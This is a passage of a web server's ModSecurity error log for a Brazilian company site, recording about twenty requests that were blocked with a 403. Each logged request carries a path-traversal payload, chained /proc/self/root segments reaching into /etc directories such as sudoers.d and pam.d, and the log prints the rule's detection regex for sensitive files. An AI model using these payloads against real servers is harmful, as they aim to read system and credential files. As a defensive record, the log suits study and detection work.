"PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ5JDEJR9VXonE_-1PFgAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:36.451260 2026] [:error] [pid 11293:tid 140411582465792] [client 74.7.243.203:44906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ5NCmCSWTlPouqorMFQAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:37.687022 2026] [:error] [pid 2553:tid 140411590858496] [client 74.7.241.46:33612] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ5f0Bec_B9OkZP_i9NgAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:37.749856 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.203:44920] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ5QeiSKl8TjouI-YCWQAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:39.089154 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.243.203:44924] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ56BJNF7axNlVR0X8kwAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:40.279056 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.243.203:47850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ6NCmCSWTlPouqorMGAAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:41.643943 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.243.203:47862] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ6QeiSKl8TjouI-YCXgAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:32:42.995185 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.243.203:47876] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ6u82sZHvlq4xgHrCiQAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:44.130912 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.243.203:47886] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ7KBJNF7axNlVR0X8lQAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:46.126555 2026] [:error] [pid 11469:tid 140411548894976] [client 74.7.243.203:47900] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ7ZDEJR9VXonE_-1PGwAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:32:50.423447 2026] [:error] [pid 1016:tid 140411616036608] [client 74.7.241.46:38356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ8pqmL8PQht4WJFlIDwAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:50.554908 2026] [:error] [pid 2159:tid 140411590858496] [client 74.7.243.203:47916] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ8vct6CQ8jnRyg2p8iQAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:32:53.379210 2026] [:error] [pid 11469:tid 140411658000128] [client 74.7.243.203:49906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ9ZDEJR9VXonE_-1PHgAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:54.745647 2026] [:error] [pid 1210:tid 140411574073088] [client 74.7.243.203:49916] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ9lKJy4A1bGlmj9BV0AAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:56.079427 2026] [:error] [pid 1731:tid 140411733534464] [client 74.7.243.203:49918] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ-Ab2qCuy5irgBMjJTAAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:57.270426 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.243.203:49920] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ-dCmCSWTlPouqorMHgAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:58.615218 2026] [:error] [pid 1731:tid 140411725141760] [client 74.7.243.203:49932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ-gb2qCuy5irgBMjJTQAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:32:59.950132 2026] [:error] [pid 2159:tid 140411557287680] [client 74.7.243.203:49934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ-_ct6CQ8jnRyg2p8kQAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:03.494851 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.243.203:44602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJ_6BJNF7axNlVR0X8pQAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:04.819588 2026] [:error] [pid 2325:tid 140411708356352] [client 74.7.243.203:44616] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKAO82sZHvlq4xgHrCkgAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:33:06.118243 2026] [:error] [pid 1016:tid 140411607643904] [client 74.7.243.203:44622] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKApqmL8PQht4WJFlIFAAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:07.893408 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.243.203:44628] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKA-82sZHvlq4xgHrClQAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
